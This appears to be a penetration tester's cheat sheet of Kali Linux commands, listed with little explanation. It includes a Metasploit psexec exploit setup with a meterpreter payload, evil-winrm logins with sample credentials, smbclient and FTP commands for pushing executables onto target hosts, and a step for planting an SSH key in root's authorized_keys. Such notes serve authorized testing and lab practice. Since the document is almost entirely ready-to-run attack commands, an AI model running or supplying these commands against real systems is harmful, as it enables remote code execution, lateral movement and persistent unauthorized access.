Kali
$ xfreerdp +clipboard /v:IP /u:foo /p:bar
# Rdp to a Win with clipboard

===========================================
============= REMOTE SESSION ==============
===========================================

Metasploit:
# If Meterpreter session17: route add 192.168.0.0/24 17
use exploit/windows/smb/psexec
set SMBUser userman
set SMBPass "userman1!"
set RHOSTS 192.168.0.1
set payload windows/x64/meterpreter/bind_tcp
set LPORT 8000
run



============= WINRM =============
evil-winrm -i 10.0.0.1 -u superadmin -p "Password\@2024"



===========================================
============= FILE TRANSFER ===============
===========================================

============= FTP =============
ftp $target
put file1.exe
mput file1.exe file2.exe
#ON FTP: Active mode with binary:
>passive
>binary

================= SMB =================
https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
smbclient //10.0.0.1/share -c 'put File1.exe'
smbclient -p 4455 //10.0.0.1/Scripts -U admin --password=Password1234 ($ get file)
smbclient //host/share -U " "%" "
smbclient -L //$target -U
smbclient --no-pass -L //$target
xdg-open smb://host/share

============= SSH =============
Keys
$ ssh-keygen
# Generates 2 files:
# "xpto.pub", which needs to be inserted on /root/.ssh/authorized_keys
# "xpto" which will be used as private key to ssh -i


================ WEBDAV =====================
pip3 install wsgidav
export PATH="/home/USER/.local/bin:$PATH"
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/USER/webdav
